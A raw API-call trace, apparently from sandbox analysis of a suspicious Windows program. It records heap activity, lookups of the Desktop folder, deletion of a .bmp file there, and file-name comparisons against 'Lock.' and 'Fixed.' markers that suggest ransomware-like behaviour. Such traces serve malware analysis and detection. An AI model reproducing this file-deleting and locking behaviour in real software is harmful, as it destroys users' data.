HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.716] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.716] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0164.717] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9bd0 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.717] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.717] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0164.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c948 [0164.718] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/FN4XiavIO4PR.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FN4XiavIO4PR.bmp", lpFilePart=0x8bedfc*="FN4XiavIO4PR.bmp") returned 0x36 [0164.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0164.719] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FN4XiavIO4PR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fn4xiavio4pr.bmp")) returned 0x20 [0164.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FN4XiavIO4PR.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fbcab0, ftCreationTime.dwHighDateTime=0x1d4caa4, ftLastAccessTime.dwLowDateTime=0xc3226d10, ftLastAccessTime.dwHighDateTime=0x1d4c9d4, ftLastWriteTime.dwLowDateTime=0xc3226d10, ftLastWriteTime.dwHighDateTime=0x1d4c9d4, nFileSizeHigh=0x0, nFileSizeLow=0x20b1, dwReserved0=0x41, dwReserved1=0x4, cFileName="FN4XiavIO4PR.bmp", cAlternateFileName="FN4XIA~1.BMP")) returned 0xaa5660 [0164.719] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FN4XiavIO4PR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fn4xiavio4pr.bmp")) returned 1 [0164.720] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fbcab0, ftCreationTime.dwHighDateTime=0x1d4caa4, ftLastAccessTime.dwLowDateTime=0xc3226d10, ftLastAccessTime.dwHighDateTime=0x1d4c9d4, ftLastWriteTime.dwLowDateTime=0xc3226d10, ftLastWriteTime.dwHighDateTime=0x1d4c9d4, nFileSizeHigh=0x0, nFileSizeLow=0x20b1, dwReserved0=0x41, dwReserved1=0x4, cFileName="FN4XiavIO4PR.bmp", cAlternateFileName="FN4XIA~1.BMP")) returned 0 [0164.720] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0164.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0164.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0164.722] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.722] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0164.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0164.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0164.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c948 [0164.724] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/FN4XiavIO4PR.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FN4XiavIO4PR.bmp", lpFilePart=0x8bf658*="FN4XiavIO4PR.bmp") returned 0x36 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0164.724] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FN4XiavIO4PR.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fn4xiavio4pr.bmp")) returned 0xffffffff [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.724] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0164.724] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.724] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0164.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0164.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.725] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0164.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GhiVvZ14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hiVvZ14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iVvZ14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvZ14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vZ14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WbSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bSoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SoIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oIVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IVTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VTo6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="To6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M.odt", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0164.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0164.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0164.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0164.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0164.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0164.726] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0164.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0164.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0164.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0164.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0164.726] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GhiVvZ14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hiVvZ14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iVvZ14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VvZ14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vZ14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Z14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="14WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WbSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bSoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SoIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oIVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IVTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VTo6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="To6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0164.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6M.odt", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 